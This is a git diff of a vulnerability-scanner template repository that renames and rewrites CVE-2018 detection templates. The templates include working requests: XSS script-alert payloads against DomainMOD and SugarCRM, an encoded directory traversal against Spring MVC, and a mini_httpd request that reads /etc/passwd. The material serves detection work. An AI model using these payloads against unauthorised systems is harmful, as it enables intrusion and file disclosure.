dsl: + - 'status_code_3 == 200' + - 'contains(all_headers_3, "text/html")' + - 'contains(body_3, ">")' + condition: and diff --git a/nuclei-templates/CVE-2018/CVE-2018-20009.yaml b/nuclei-templates/CVE-2018/CVE-2018-20009.yaml deleted file mode 100644 index e6a0801a38..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-20009.yaml +++ /dev/null @@ -1,47 +0,0 @@ -id: CVE-2018-20009 -info: - name: DomainMOD 4.11.01 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via /assets/add/ssl-provider.php ssl-provider-name, ssl-provider's-url parameters. - reference: - - https://github.com/domainmod/domainmod/issues/88 - - https://nvd.nist.gov/vuln/detail/CVE-2018-20009 - - https://www.exploit-db.com/exploits/46372/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N - cvss-score: 4.8 - cve-id: CVE-2018-20009 - cwe-id: CWE-79 - metadata: - verified: true - tags: cve,cve2018,domainmod,xss,authenticated -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_username={{username}}&new_password={{password}} - - | - POST /assets/add/ssl-provider.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_ssl_provider=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=&new_notes= - - | - GET /assets/ssl-providers.php HTTP/1.1 - Host: {{Hostname}} - cookie-reuse: true - redirects: true - max-redirects: 2 - req-condition: true - matchers: - - type: dsl - dsl: - - 'status_code_3 == 200' - - 'contains(all_headers_3, "text/html")' - - 'contains(body_3, ">")' - condition: and diff --git a/nuclei-templates/CVE-2018/CVE-2018-20010.yaml b/nuclei-templates/CVE-2018/CVE-2018-20010.yaml deleted file mode 100644 index ca5de31180..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-20010.yaml +++ /dev/null @@ -1,47 +0,0 @@ -id: CVE-2018-20010 -info: - name: DomainMOD 4.11.01 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via /assets/add/ssl-provider-account.php Username field. - reference: - - https://www.exploit-db.com/exploits/46373/ - - https://nvd.nist.gov/vuln/detail/CVE-2018-20010 - - https://github.com/domainmod/domainmod/issues/88 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N - cvss-score: 4.8 - cve-id: CVE-2018-20010 - cwe-id: CWE-79 - metadata: - verified: true - tags: cve,cve2018,domainmod,xss,authenticated -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_username={{username}}&new_password={{password}} - - | - POST /assets/add/ssl-provider-account.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_ssl_provider_id=1&new_owner_id=1&new_email_address=&new_username=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_password=&new_reseller=0&new_reseller_id=&new_notes= - - | - GET /assets/ssl-accounts.php HTTP/1.1 - Host: {{Hostname}} - cookie-reuse: true - redirects: true - max-redirects: 2 - req-condition: true - matchers: - - type: dsl - dsl: - - 'status_code_3 == 200' - - 'contains(all_headers_3, "text/html")' - - 'contains(body_3, ">")' - condition: and diff --git a/nuclei-templates/CVE-2018/cve-2018-20985.yaml b/nuclei-templates/CVE-2018/CVE-2018-20985.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-20985.yaml rename to nuclei-templates/CVE-2018/CVE-2018-20985.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-2628.yaml b/nuclei-templates/CVE-2018/CVE-2018-2628.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-2628.yaml rename to nuclei-templates/CVE-2018/CVE-2018-2628.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-3714.yaml b/nuclei-templates/CVE-2018/CVE-2018-3714.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-3714.yaml rename to nuclei-templates/CVE-2018/CVE-2018-3714.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-3760.yaml b/nuclei-templates/CVE-2018/CVE-2018-3760.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-3760.yaml rename to nuclei-templates/CVE-2018/CVE-2018-3760.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-3810.yaml b/nuclei-templates/CVE-2018/CVE-2018-3810.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-3810.yaml rename to nuclei-templates/CVE-2018/CVE-2018-3810.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-5715.yaml b/nuclei-templates/CVE-2018/CVE-2018-5715.yaml deleted file mode 100644 index fc043311e1..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-5715.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2018-5715 -info: - name: SugarCRM 3.5.1 - Reflected XSS - author: edoardottt - severity: medium - description: phprint.php in SugarCRM 3.5.1 has XSS via a parameter name in the query string (aka a $key variable). - reference: - - https://www.exploit-db.com/exploits/43683 - - https://nvd.nist.gov/vuln/detail/CVE-2018-5715 - - https://m4k4br0.github.io/sugarcrm-xss/ - - https://www.exploit-db.com/exploits/43683/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2018-5715 - cwe-id: CWE-79 - metadata: - google-dork: intext:"SugarCRM Inc. All Rights Reserved" - shodan-query: http.html:"SugarCRM Inc. All Rights Reserved" - tags: cve,cve2018,sugarcrm,xss -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?action=Login&module=Users&print=a&%22%2F%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E" - matchers-condition: and - matchers: - - type: word - part: body - words: - - '&"/>=&"><< Back

' - - type: word - part: header - words: - - "text/html" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-6008.yaml b/nuclei-templates/CVE-2018/CVE-2018-6008.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-6008.yaml rename to nuclei-templates/CVE-2018/CVE-2018-6008.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-6200.yaml b/nuclei-templates/CVE-2018/CVE-2018-6200.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-6200.yaml rename to nuclei-templates/CVE-2018/CVE-2018-6200.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-7422.yaml b/nuclei-templates/CVE-2018/CVE-2018-7422.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-7422.yaml rename to nuclei-templates/CVE-2018/CVE-2018-7422.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-7490.yaml b/nuclei-templates/CVE-2018/CVE-2018-7490.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-7490.yaml rename to nuclei-templates/CVE-2018/CVE-2018-7490.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-7662.yaml b/nuclei-templates/CVE-2018/CVE-2018-7662.yaml deleted file mode 100644 index eb56470249..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-7662.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2018-7662 - -info: - name: CouchCMS Full Path Disclosure - author: ritikchaddha - severity: medium - description: phpmailer.php and mysql2i.func.php disclosure the full path - reference: https://github.com/CouchCMS/CouchCMS/issues/46 - tags: couchcms,fpd,cve,cve2018 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.30 - cve-id: CVE-2018-7662 - cwe-id: CWE-200 - -requests: - - method: GET - path: - - "{{BaseURL}}/includes/mysql2i/mysql2i.func.php" - - "{{BaseURL}}/addons/phpmailer/phpmailer.php" - - stop-at-first-match: true - matchers-condition: or - matchers: - - type: word - part: body - words: - - "mysql2i.func.php on line 10" - - "Fatal error: Cannot redeclare mysql_affected_rows() in" - condition: and - - - type: word - part: body - words: - - "phpmailer.php on line 10" - - "Fatal error: Call to a menber function add_event_listener() on a non-object in" - condition: and diff --git a/nuclei-templates/CVE-2018/cve-2018-9118.yaml b/nuclei-templates/CVE-2018/CVE-2018-9118.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-9118.yaml rename to nuclei-templates/CVE-2018/CVE-2018-9118.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-1000856.yaml b/nuclei-templates/CVE-2018/cve-2018-1000856.yaml new file mode 100644 index 0000000000..954d32e9fb --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-1000856.yaml @@ -0,0 +1,61 @@ +id: CVE-2018-1000856 + +info: + name: DomainMOD 4.11.01 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + DomainMOD 4.11.01 is vulnerable to cross-site scripting via the segments/add.php Segment Name field. + reference: + - https://github.com/domainmod/domainmod/issues/80 + - https://nvd.nist.gov/vuln/detail/CVE-2018-1000856 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.8 + cve-id: CVE-2018-1000856 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve,cve2018,domainmod,xss,authenticated + +requests: + - raw: + + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_username={{username}}&new_password={{password}} + - | + POST /segments/add.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&raw_domain_list=test.com&new_description=test&new_notes=test + + - | + GET /segments/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + cookie-reuse: true + host-redirects: true + max-redirects: 3 + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/08/18 diff --git a/nuclei-templates/CVE-2018/CVE-2018-1000861.yaml b/nuclei-templates/CVE-2018/cve-2018-1000861.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-1000861.yaml rename to nuclei-templates/CVE-2018/cve-2018-1000861.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-10562.yaml b/nuclei-templates/CVE-2018/cve-2018-10562.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-10562.yaml rename to nuclei-templates/CVE-2018/cve-2018-10562.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-10956.yaml b/nuclei-templates/CVE-2018/cve-2018-10956.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-10956.yaml rename to nuclei-templates/CVE-2018/cve-2018-10956.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-11709.yaml b/nuclei-templates/CVE-2018/cve-2018-11709.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-11709.yaml rename to nuclei-templates/CVE-2018/cve-2018-11709.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-11784.yaml b/nuclei-templates/CVE-2018/cve-2018-11784.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-11784.yaml rename to nuclei-templates/CVE-2018/cve-2018-11784.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-12300.yaml b/nuclei-templates/CVE-2018/cve-2018-12300.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-12300.yaml rename to nuclei-templates/CVE-2018/cve-2018-12300.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-12613.yaml b/nuclei-templates/CVE-2018/cve-2018-12613.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-12613.yaml rename to nuclei-templates/CVE-2018/cve-2018-12613.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-12675.yaml b/nuclei-templates/CVE-2018/cve-2018-12675.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-12675.yaml rename to nuclei-templates/CVE-2018/cve-2018-12675.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-1271.yaml b/nuclei-templates/CVE-2018/cve-2018-1271.yaml new file mode 100644 index 0000000000..ccf03eab13 --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-1271.yaml @@ -0,0 +1,28 @@ +id: CVE-2018-1271 + +info: + name: Spring MVC Directory Traversal Vulnerability + author: hetroublemakr + severity: medium + reference: https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d + + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 5.90 + cve-id: CVE-2018-1271 + cwe-id: CWE-22 + description: "Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). When static resources are served from a file system on Windows (as opposed to the classpath, or the ServletContext), a malicious user can send a request using a specially crafted URL that can lead a directory traversal attack." + +requests: + - method: GET + path: + - '{{BaseURL}}/static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini' + - '{{BaseURL}}/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini' + matchers-condition: and + matchers: + - type: word + words: + - 'for 16-bit app support' + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2018/CVE-2018-13380.yaml b/nuclei-templates/CVE-2018/cve-2018-13380.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-13380.yaml rename to nuclei-templates/CVE-2018/cve-2018-13380.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-14931.yaml b/nuclei-templates/CVE-2018/cve-2018-14931.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-14931.yaml rename to nuclei-templates/CVE-2018/cve-2018-14931.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-15745.yaml b/nuclei-templates/CVE-2018/cve-2018-15745.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-15745.yaml rename to nuclei-templates/CVE-2018/cve-2018-15745.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-16299.yaml b/nuclei-templates/CVE-2018/cve-2018-16299.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-16299.yaml rename to nuclei-templates/CVE-2018/cve-2018-16299.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-16670.yaml b/nuclei-templates/CVE-2018/cve-2018-16670.yaml deleted file mode 100644 index bf69edf1c7..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-16670.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2018-16670 - -info: - name: CirCarLife SCADA PLC Status - author: geeknik - severity: medium - description: PLC status disclosure due to lack of authentication - reference: - - https://www.exploit-db.com/exploits/45384 - - https://github.com/SadFud/Exploits/tree/master/Real%20World/Suites/cir-pwn-life - - https://www.exploit-db.com/exploits/45384/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2018-16670 - cwe-id: CWE-287 - tags: cve,cve2018,circarlife,scada,plc,iot,disclosure - -requests: - - method: GET - path: - - "{{BaseURL}}/services/user/values.xml?var=STATUS" - - matchers-condition: and - matchers: - - type: word - part: header - words: - - "CirCarLife Scada" - - type: word - part: body - words: - - "" - - "Reader.STATUS" - condition: and diff --git a/nuclei-templates/CVE-2018/CVE-2018-18570.yaml b/nuclei-templates/CVE-2018/cve-2018-18570.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-18570.yaml rename to nuclei-templates/CVE-2018/cve-2018-18570.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-18778.yaml b/nuclei-templates/CVE-2018/cve-2018-18778.yaml new file mode 100644 index 0000000000..a26da58807 --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-18778.yaml @@ -0,0 +1,31 @@ +id: CVE-2018-18778 + +info: + name: mini_httpd Path Traversal + author: dhiyaneshDK + severity: medium + description: ACME mini_httpd before 1.30 lets remote users read arbitrary files. + reference: https://www.acunetix.com/vulnerabilities/web/acme-mini_httpd-arbitrary-file-read/ + + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.50 + cve-id: CVE-2018-18778 + cwe-id: CWE-200 + +requests: + - raw: + - |+ + GET /etc/passwd HTTP/1.1 + Host: + + unsafe: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: regex + regex: + - "root:.*:0:0:" diff --git a/nuclei-templates/CVE-2018/CVE-2018-19386.yaml b/nuclei-templates/CVE-2018/cve-2018-19386.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-19386.yaml rename to nuclei-templates/CVE-2018/cve-2018-19386.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-19439.yaml b/nuclei-templates/CVE-2018/cve-2018-19439.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-19439.yaml rename to nuclei-templates/CVE-2018/cve-2018-19439.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-19458.yaml b/nuclei-templates/CVE-2018/cve-2018-19458.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-19458.yaml rename to nuclei-templates/CVE-2018/cve-2018-19458.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-19751.yaml b/nuclei-templates/CVE-2018/cve-2018-19751.yaml deleted file mode 100644 index 7a50117796..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-19751.yaml +++ /dev/null @@ -1,62 +0,0 @@ -id: CVE-2018-19751 - -info: - name: DomainMOD 4.11.01 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - DomainMOD 4.11.01 contains a cross-site scripting vulnerability via /admin/ssl-fields/add.php Display Name, Description & Notes field parameters. - reference: - - https://www.exploit-db.com/exploits/45947/ - - https://github.com/domainmod/domainmod/issues/83 - - https://nvd.nist.gov/vuln/detail/CVE-2018-19751 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N - cvss-score: 4.8 - cve-id: CVE-2018-19751 - cwe-id: CWE-79 - metadata: - verified: "true" - tags: cve,cve2018,domainmod,xss,authenticated,edb - -requests: - - raw: - - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_username={{username}}&new_password={{password}} - - - | - POST /admin/ssl-fields/add.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_field_name=new&new_field_type_id=1&new_description=test&new_notes=test - - - | - GET /admin/ssl-fields/ HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - host-redirects: true - max-redirects: 2 - matchers-condition: and - matchers: - - type: word - part: body - words: - - '">' - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/08/31 diff --git a/nuclei-templates/CVE-2018/cve-2018-19752.yaml b/nuclei-templates/CVE-2018/cve-2018-19752.yaml deleted file mode 100644 index 0466e46689..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-19752.yaml +++ /dev/null @@ -1,61 +0,0 @@ -id: CVE-2018-19752 - -info: - name: DomainMOD 4.11.01 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - DomainMOD through 4.11.01 contains a cross-site scripting vulnerability via the assets/add/registrar.php notes field for Registrar. - reference: - - https://github.com/domainmod/domainmod/issues/84 - - https://www.exploit-db.com/exploits/45949/ - - https://nvd.nist.gov/vuln/detail/CVE-2018-19752 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N - cvss-score: 4.8 - cve-id: CVE-2018-19752 - cwe-id: CWE-79 - metadata: - verified: "true" - tags: cve,cve2018,domainmod,xss,authenticated,edb - -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_username={{username}}&new_password={{password}} - - - | - POST /assets/add/registrar.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_registrar=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=test&new_api_registrar_id=0&new_notes=test - - - | - GET /assets/registrars.php HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - host-redirects: true - max-redirects: 2 - matchers-condition: and - matchers: - - type: word - part: body - words: - - '">' - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/08/31 diff --git a/nuclei-templates/CVE-2018/cve-2018-19892.yaml b/nuclei-templates/CVE-2018/cve-2018-19892.yaml new file mode 100644 index 0000000000..f310b4f7f4 --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-19892.yaml @@ -0,0 +1,61 @@ +id: CVE-2018-19892 + +info: + name: DomainMOD 4.11.01 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + DomainMOD 4.11.01 contains a cross-site scripting vulnerability via /domain//admin/dw/add-server.php DisplayName parameters. + reference: + - https://www.exploit-db.com/exploits/45959 + - https://github.com/domainmod/domainmod/issues/85 + - https://nvd.nist.gov/vuln/detail/CVE-2018-19892 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.8 + cve-id: CVE-2018-19892 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve2018,domainmod,xss,authenticated,edb,cve + +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_username={{username}}&new_password={{password}} + + - | + POST /admin/dw/add-server.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_host=abc&new_protocol=https&new_port=2086&new_username=abc&new_api_token=255&new_hash=&new_notes= + + - | + GET /admin/dw/servers.php HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + host-redirects: true + max-redirects: 3 + matchers-condition: and + matchers: + - type: word + part: body + words: + - '">' + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/08/31 diff --git a/nuclei-templates/CVE-2018/cve-2018-19914.yaml b/nuclei-templates/CVE-2018/cve-2018-19914.yaml deleted file mode 100644 index f4203954c8..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-19914.yaml +++ /dev/null @@ -1,54 +0,0 @@ -id: CVE-2018-19914 - -info: - name: DomainMOD 4.11.01 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - DomainMOD 4.11.01 contains a cross-site scripting vulnerability via assets/add/dns.php Profile Name or notes field. - reference: - - https://www.exploit-db.com/exploits/46375/ - - https://github.com/domainmod/domainmod/issues/87 - - https://nvd.nist.gov/vuln/detail/CVE-2018-19914 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N - cvss-score: 4.8 - cve-id: CVE-2018-19914 - cwe-id: CWE-79 - metadata: - verified: "true" - tags: cve2018,domainmod,xss,authenticated,edb,cve - -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_username={{username}}&new_password={{password}} - - - | - POST /assets/add/dns.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_dns1=abc&new_ip1=&new_dns2=abc&new_ip2=&new_dns3=abc&new_ip3=&new_dns4=&new_ip4=&new_dns5=&new_ip5=&new_dns6=&new_ip6=&new_dns7=&new_ip7=&new_dns8=&new_ip8=&new_dns9=&new_ip9=&new_dns10=&new_ip10=&new_notes=%3Cscript%3Ealert%281%29%3C%2Fscript%3E - - - | - GET /assets/dns.php HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - host-redirects: true - max-redirects: 2 - req-condition: true - matchers: - - type: dsl - dsl: - - 'status_code_3 == 200' - - 'contains(all_headers_3, "text/html")' - - 'contains(body_3, ">")' - condition: and - -# Enhanced by mp on 2022/08/31 diff --git a/nuclei-templates/CVE-2018/cve-2018-19915.yaml b/nuclei-templates/CVE-2018/cve-2018-19915.yaml deleted file mode 100644 index 5a975e956b..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-19915.yaml +++ /dev/null @@ -1,54 +0,0 @@ -id: CVE-2018-19915 - -info: - name: DomainMOD <=4.11.01 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the assets/edit/host.php Web Host Name or Web Host URL field. - reference: - - https://github.com/domainmod/domainmod/issues/87 - - https://www.exploit-db.com/exploits/46376/ - - https://nvd.nist.gov/vuln/detail/CVE-2018-19915 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N - cvss-score: 4.8 - cve-id: CVE-2018-19915 - cwe-id: CWE-79 - metadata: - verified: true - tags: domainmod,xss,authenticated,edb,cve,cve2018 - -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_username={{username}}&new_password={{password}} - - - | - POST /assets/add/host.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_host=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_notes=test - - - | - GET /assets/hosting.php HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - host-redirects: true - max-redirects: 2 - req-condition: true - matchers: - - type: dsl - dsl: - - 'status_code_3 == 200' - - 'contains(all_headers_3, "text/html")' - - 'contains(body_3, ">")' - condition: and - -# Enhanced by mp on 2022/08/10 diff --git a/nuclei-templates/CVE-2018/cve-2018-20009.yaml b/nuclei-templates/CVE-2018/cve-2018-20009.yaml new file mode 100644 index 0000000000..40298f6945 --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-20009.yaml @@ -0,0 +1,54 @@ +id: CVE-2018-20009 + +info: + name: DomainMOD 4.11.01 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the /assets/add/ssl-provider.php ssl-provider-name and ssl-provider's-url parameters. + reference: + - https://github.com/domainmod/domainmod/issues/88 + - https://www.exploit-db.com/exploits/46372/ + - https://nvd.nist.gov/vuln/detail/CVE-2018-20009 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.8 + cve-id: CVE-2018-20009 + cwe-id: CWE-79 + metadata: + verified: true + tags: domainmod,xss,authenticated,edb,cve,cve2018 + +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_username={{username}}&new_password={{password}} + + - | + POST /assets/add/ssl-provider.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_ssl_provider=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=&new_notes= + + - | + GET /assets/ssl-providers.php HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + host-redirects: true + max-redirects: 2 + req-condition: true + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(all_headers_3, "text/html")' + - 'contains(body_3, ">")' + condition: and + +# Enhanced by mp on 2022/08/10 diff --git a/nuclei-templates/CVE-2018/cve-2018-20010.yaml b/nuclei-templates/CVE-2018/cve-2018-20010.yaml new file mode 100644 index 0000000000..9f5e6c82a0 --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-20010.yaml @@ -0,0 +1,54 @@ +id: CVE-2018-20010 + +info: + name: DomainMOD 4.11.01 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the /assets/add/ssl-provider-account.php Username field. + reference: + - https://www.exploit-db.com/exploits/46373/ + - https://github.com/domainmod/domainmod/issues/88 + - https://nvd.nist.gov/vuln/detail/CVE-2018-20010 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.8 + cve-id: CVE-2018-20010 + cwe-id: CWE-79 + metadata: + verified: true + tags: domainmod,xss,authenticated,edb,cve,cve2018 + +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_username={{username}}&new_password={{password}} + + - | + POST /assets/add/ssl-provider-account.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_ssl_provider_id=1&new_owner_id=1&new_email_address=&new_username=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_password=&new_reseller=0&new_reseller_id=&new_notes= + + - | + GET /assets/ssl-accounts.php HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + host-redirects: true + max-redirects: 2 + req-condition: true + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(all_headers_3, "text/html")' + - 'contains(body_3, ">")' + condition: and 